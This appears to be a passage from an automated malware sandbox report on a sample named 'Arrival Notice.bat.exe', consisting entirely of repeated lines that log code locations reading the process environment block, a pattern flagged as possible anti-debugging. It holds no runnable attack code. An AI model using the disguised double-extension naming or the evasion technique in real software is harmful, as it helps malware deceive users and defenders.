              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F2349 mov eax, dword ptr fs:[00000030h]8_2_015F2349
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F2349 mov eax, dword ptr fs:[00000030h]8_2_015F2349
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F2349 mov eax, dword ptr fs:[00000030h]8_2_015F2349
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F2349 mov eax, dword ptr fs:[00000030h]8_2_015F2349
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F2349 mov eax, dword ptr fs:[00000030h]8_2_015F2349
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F2349 mov eax, dword ptr fs:[00000030h]8_2_015F2349
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F2349 mov eax, dword ptr fs:[00000030h]8_2_015F2349
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F2349 mov eax, dword ptr fs:[00000030h]8_2_015F2349
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F2349 mov eax, dword ptr fs:[00000030h]8_2_015F2349
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F2349 mov eax, dword ptr fs:[00000030h]8_2_015F2349
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F2349 mov eax, dword ptr fs:[00000030h]8_2_015F2349
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161437C mov eax, dword ptr fs:[00000030h]8_2_0161437C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0164634F mov eax, dword ptr fs:[00000030h]8_2_0164634F
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163A352 mov eax, dword ptr fs:[00000030h]8_2_0163A352
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01618350 mov ecx, dword ptr fs:[00000030h]8_2_01618350
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01648324 mov eax, dword ptr fs:[00000030h]8_2_01648324
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01648324 mov ecx, dword ptr fs:[00000030h]8_2_01648324
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01648324 mov eax, dword ptr fs:[00000030h]8_2_01648324
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01648324 mov eax, dword ptr fs:[00000030h]8_2_01648324
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156C310 mov ecx, dword ptr fs:[00000030h]8_2_0156C310
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01590310 mov ecx, dword ptr fs:[00000030h]8_2_01590310
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AA30B mov eax, dword ptr fs:[00000030h]8_2_015AA30B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AA30B mov eax, dword ptr fs:[00000030h]8_2_015AA30B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AA30B mov eax, dword ptr fs:[00000030h]8_2_015AA30B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015783C0 mov eax, dword ptr fs:[00000030h]8_2_015783C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015783C0 mov eax, dword ptr fs:[00000030h]8_2_015783C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015783C0 mov eax, dword ptr fs:[00000030h]8_2_015783C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015783C0 mov eax, dword ptr fs:[00000030h]8_2_015783C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A3C0 mov eax, dword ptr fs:[00000030h]8_2_0157A3C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A3C0 mov eax, dword ptr fs:[00000030h]8_2_0157A3C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A3C0 mov eax, dword ptr fs:[00000030h]8_2_0157A3C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A3C0 mov eax, dword ptr fs:[00000030h]8_2_0157A3C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A3C0 mov eax, dword ptr fs:[00000030h]8_2_0157A3C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A3C0 mov eax, dword ptr fs:[00000030h]8_2_0157A3C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F63C0 mov eax, dword ptr fs:[00000030h]8_2_015F63C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A63FF mov eax, dword ptr fs:[00000030h]8_2_015A63FF
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158E3F0 mov eax, dword ptr fs:[00000030h]8_2_0158E3F0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158E3F0 mov eax, dword ptr fs:[00000030h]8_2_0158E3F0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158E3F0 mov eax, dword ptr fs:[00000030h]8_2_0158E3F0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0162C3CD mov eax, dword ptr fs:[00000030h]8_2_0162C3CD
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015803E9 mov eax, dword ptr fs:[00000030h]8_2_015803E9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015803E9 mov eax, dword ptr fs:[00000030h]8_2_015803E9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015803E9 mov eax, dword ptr fs:[00000030h]8_2_015803E9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015803E9 mov eax, dword ptr fs:[00000030h]8_2_015803E9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015803E9 mov eax, dword ptr fs:[00000030h]8_2_015803E9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015803E9 mov eax, dword ptr fs:[00000030h]8_2_015803E9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015803E9 mov eax, dword ptr fs:[00000030h]8_2_015803E9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015803E9 mov eax, dword ptr fs:[00000030h]8_2_015803E9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016143D4 mov eax, dword ptr fs:[00000030h]8_2_016143D4
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016143D4 mov eax, dword ptr fs:[00000030h]8_2_016143D4
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161E3DB mov eax, dword ptr fs:[00000030h]8_2_0161E3DB
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161E3DB mov eax, dword ptr fs:[00000030h]8_2_0161E3DB
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161E3DB mov ecx, dword ptr fs:[00000030h]8_2_0161E3DB
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161E3DB mov eax, dword ptr fs:[00000030h]8_2_0161E3DB
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01568397 mov eax, dword ptr fs:[00000030h]8_2_01568397
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01568397 mov eax, dword ptr fs:[00000030h]8_2_01568397
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01568397 mov eax, dword ptr fs:[00000030h]8_2_01568397
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159438F mov eax, dword ptr fs:[00000030h]8_2_0159438F
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159438F mov eax, dword ptr fs:[00000030h]8_2_0159438F
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156E388 mov eax, dword ptr fs:[00000030h]8_2_0156E388
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156E388 mov eax, dword ptr fs:[00000030h]8_2_0156E388
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156E388 mov eax, dword ptr fs:[00000030h]8_2_0156E388
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156A250 mov eax, dword ptr fs:[00000030h]8_2_0156A250
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01576259 mov eax, dword ptr fs:[00000030h]8_2_01576259
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01620274 mov eax, dword ptr fs:[00000030h]8_2_01620274
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01620274 mov eax, dword ptr fs:[00000030h]8_2_01620274
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01620274 mov eax, dword ptr fs:[00000030h]8_2_01620274
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01620274 mov eax, dword ptr fs:[00000030h]8_2_01620274
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01620274 mov eax, dword ptr fs:[00000030h]8_2_01620274
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01620274 mov eax, dword ptr fs:[00000030h]8_2_01620274
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01620274 mov eax, dword ptr fs:[00000030h]8_2_01620274
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01620274 mov eax, dword ptr fs:[00000030h]8_2_01620274
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01620274 mov eax, dword ptr fs:[00000030h]8_2_01620274
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01620274 mov eax, dword ptr fs:[00000030h]8_2_01620274
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01620274 mov eax, dword ptr fs:[00000030h]8_2_01620274
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01620274 mov eax, dword ptr fs:[00000030h]8_2_01620274
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F8243 mov eax, dword ptr fs:[00000030h]8_2_015F8243
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F8243 mov ecx, dword ptr fs:[00000030h]8_2_015F8243
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0162A250 mov eax, dword ptr fs:[00000030h]8_2_0162A250
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0162A250 mov eax, dword ptr fs:[00000030h]8_2_0162A250
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01574260 mov eax, dword ptr fs:[00000030h]8_2_01574260
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01574260 mov eax, dword ptr fs:[00000030h]8_2_01574260
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01574260 mov eax, dword ptr fs:[00000030h]8_2_01574260
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0164625D mov eax, dword ptr fs:[00000030h]8_2_0164625D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156826B mov eax, dword ptr fs:[00000030h]8_2_0156826B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156823B mov eax, dword ptr fs:[00000030h]8_2_0156823B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A2C3 mov eax, dword ptr fs:[00000030h]8_2_0157A2C3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A2C3 mov eax, dword ptr fs:[00000030h]8_2_0157A2C3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A2C3 mov eax, dword ptr fs:[00000030h]8_2_0157A2C3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A2C3 mov eax, dword ptr fs:[00000030h]8_2_0157A2C3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157A2C3 mov eax, dword ptr fs:[00000030h]8_2_0157A2C3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016462D6 mov eax, dword ptr fs:[00000030h]8_2_016462D6
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015802E1 mov eax, dword ptr fs:[00000030h]8_2_015802E1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015802E1 mov eax, dword ptr fs:[00000030h]8_2_015802E1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015802E1 mov eax, dword ptr fs:[00000030h]8_2_015802E1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016062A0 mov eax, dword ptr fs:[00000030h]8_2_016062A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016062A0 mov ecx, dword ptr fs:[00000030h]8_2_016062A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016062A0 mov eax, dword ptr fs:[00000030h]8_2_016062A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016062A0 mov eax, dword ptr fs:[00000030h]8_2_016062A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016062A0 mov eax, dword ptr fs:[00000030h]8_2_016062A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016062A0 mov eax, dword ptr fs:[00000030h]8_2_016062A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F0283 mov eax, dword ptr fs:[00000030h]8_2_015F0283
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F0283 mov eax, dword ptr fs:[00000030h]8_2_015F0283
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F0283 mov eax, dword ptr fs:[00000030h]8_2_015F0283
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE284 mov eax, dword ptr fs:[00000030h]8_2_015AE284
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE284 mov eax, dword ptr fs:[00000030h]8_2_015AE284
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015802A0 mov eax, dword ptr fs:[00000030h]8_2_015802A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015802A0 mov eax, dword ptr fs:[00000030h]8_2_015802A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01578550 mov eax, dword ptr fs:[00000030h]8_2_01578550
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01578550 mov eax, dword ptr fs:[00000030h]8_2_01578550
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A656A mov eax, dword ptr fs:[00000030h]8_2_015A656A
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A656A mov eax, dword ptr fs:[00000030h]8_2_015A656A
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A656A mov eax, dword ptr fs:[00000030h]8_2_015A656A
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01606500 mov eax, dword ptr fs:[00000030h]8_2_01606500
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644500 mov eax, dword ptr fs:[00000030h]8_2_01644500
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644500 mov eax, dword ptr fs:[00000030h]8_2_01644500
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644500 mov eax, dword ptr fs:[00000030h]8_2_01644500
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644500 mov eax, dword ptr fs:[00000030h]8_2_01644500
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644500 mov eax, dword ptr fs:[00000030h]8_2_01644500
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644500 mov eax, dword ptr fs:[00000030h]8_2_01644500
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644500 mov eax, dword ptr fs:[00000030h]8_2_01644500
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E53E mov eax, dword ptr fs:[00000030h]8_2_0159E53E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E53E mov eax, dword ptr fs:[00000030h]8_2_0159E53E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E53E mov eax, dword ptr fs:[00000030h]8_2_0159E53E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E53E mov eax, dword ptr fs:[00000030h]8_2_0159E53E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E53E mov eax, dword ptr fs:[00000030h]8_2_0159E53E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580535 mov eax, dword ptr fs:[00000030h]8_2_01580535
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580535 mov eax, dword ptr fs:[00000030h]8_2_01580535
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580535 mov eax, dword ptr fs:[00000030h]8_2_01580535
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580535 mov eax, dword ptr fs:[00000030h]8_2_01580535
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580535 mov eax, dword ptr fs:[00000030h]8_2_01580535
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580535 mov eax, dword ptr fs:[00000030h]8_2_01580535
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015765D0 mov eax, dword ptr fs:[00000030h]8_2_015765D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AA5D0 mov eax, dword ptr fs:[00000030h]8_2_015AA5D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AA5D0 mov eax, dword ptr fs:[00000030h]8_2_015AA5D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE5CF mov eax, dword ptr fs:[00000030h]8_2_015AE5CF
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE5CF mov eax, dword ptr fs:[00000030h]8_2_015AE5CF
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015725E0 mov eax, dword ptr fs:[00000030h]8_2_015725E0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AC5ED mov eax, dword ptr fs:[00000030h]8_2_015AC5ED
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AC5ED mov eax, dword ptr fs:[00000030h]8_2_015AC5ED
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E5E7 mov eax, dword ptr fs:[00000030h]8_2_0159E5E7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E5E7 mov eax, dword ptr fs:[00000030h]8_2_0159E5E7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E5E7 mov eax, dword ptr fs:[00000030h]8_2_0159E5E7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E5E7 mov eax, dword ptr fs:[00000030h]8_2_0159E5E7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E5E7 mov eax, dword ptr fs:[00000030h]8_2_0159E5E7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E5E7 mov eax, dword ptr fs:[00000030h]8_2_0159E5E7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E5E7 mov eax, dword ptr fs:[00000030h]8_2_0159E5E7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E5E7 mov eax, dword ptr fs:[00000030h]8_2_0159E5E7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE59C mov eax, dword ptr fs:[00000030h]8_2_015AE59C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A4588 mov eax, dword ptr fs:[00000030h]8_2_015A4588
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01572582 mov eax, dword ptr fs:[00000030h]8_2_01572582
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01572582 mov ecx, dword ptr fs:[00000030h]8_2_01572582
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015945B1 mov eax, dword ptr fs:[00000030h]8_2_015945B1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015945B1 mov eax, dword ptr fs:[00000030h]8_2_015945B1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F05A7 mov eax, dword ptr fs:[00000030h]8_2_015F05A7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F05A7 mov eax, dword ptr fs:[00000030h]8_2_015F05A7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F05A7 mov eax, dword ptr fs:[00000030h]8_2_015F05A7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159245A mov eax, dword ptr fs:[00000030h]8_2_0159245A
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156645D mov eax, dword ptr fs:[00000030h]8_2_0156645D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE443 mov eax, dword ptr fs:[00000030h]8_2_015AE443
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE443 mov eax, dword ptr fs:[00000030h]8_2_015AE443
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE443 mov eax, dword ptr fs:[00000030h]8_2_015AE443
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE443 mov eax, dword ptr fs:[00000030h]8_2_015AE443
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE443 mov eax, dword ptr fs:[00000030h]8_2_015AE443
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE443 mov eax, dword ptr fs:[00000030h]8_2_015AE443
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE443 mov eax, dword ptr fs:[00000030h]8_2_015AE443
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE443 mov eax, dword ptr fs:[00000030h]8_2_015AE443
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159A470 mov eax, dword ptr fs:[00000030h]8_2_0159A470
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159A470 mov eax, dword ptr fs:[00000030h]8_2_0159A470
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159A470 mov eax, dword ptr fs:[00000030h]8_2_0159A470
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0162A456 mov eax, dword ptr fs:[00000030h]8_2_0162A456
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FC460 mov ecx, dword ptr fs:[00000030h]8_2_015FC460
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A8402 mov eax, dword ptr fs:[00000030h]8_2_015A8402
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A8402 mov eax, dword ptr fs:[00000030h]8_2_015A8402
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A8402 mov eax, dword ptr fs:[00000030h]8_2_015A8402
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156C427 mov eax, dword ptr fs:[00000030h]8_2_0156C427
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156E420 mov eax, dword ptr fs:[00000030h]8_2_0156E420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156E420 mov eax, dword ptr fs:[00000030h]8_2_0156E420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156E420 mov eax, dword ptr fs:[00000030h]8_2_0156E420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F6420 mov eax, dword ptr fs:[00000030h]8_2_015F6420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F6420 mov eax, dword ptr fs:[00000030h]8_2_015F6420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F6420 mov eax, dword ptr fs:[00000030h]8_2_015F6420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F6420 mov eax, dword ptr fs:[00000030h]8_2_015F6420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F6420 mov eax, dword ptr fs:[00000030h]8_2_015F6420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F6420 mov eax, dword ptr fs:[00000030h]8_2_015F6420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F6420 mov eax, dword ptr fs:[00000030h]8_2_015F6420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015704E5 mov ecx, dword ptr fs:[00000030h]8_2_015704E5
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A44B0 mov ecx, dword ptr fs:[00000030h]8_2_015A44B0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FA4B0 mov eax, dword ptr fs:[00000030h]8_2_015FA4B0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0162A49A mov eax, dword ptr fs:[00000030h]8_2_0162A49A
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015764AB mov eax, dword ptr fs:[00000030h]8_2_015764AB
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FE75D mov eax, dword ptr fs:[00000030h]8_2_015FE75D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01570750 mov eax, dword ptr fs:[00000030h]8_2_01570750
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F4755 mov eax, dword ptr fs:[00000030h]8_2_015F4755
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2750 mov eax, dword ptr fs:[00000030h]8_2_015B2750
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2750 mov eax, dword ptr fs:[00000030h]8_2_015B2750
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A674D mov esi, dword ptr fs:[00000030h]8_2_015A674D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A674D mov eax, dword ptr fs:[00000030h]8_2_015A674D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A674D mov eax, dword ptr fs:[00000030h]8_2_015A674D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01578770 mov eax, dword ptr fs:[00000030h]8_2_01578770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
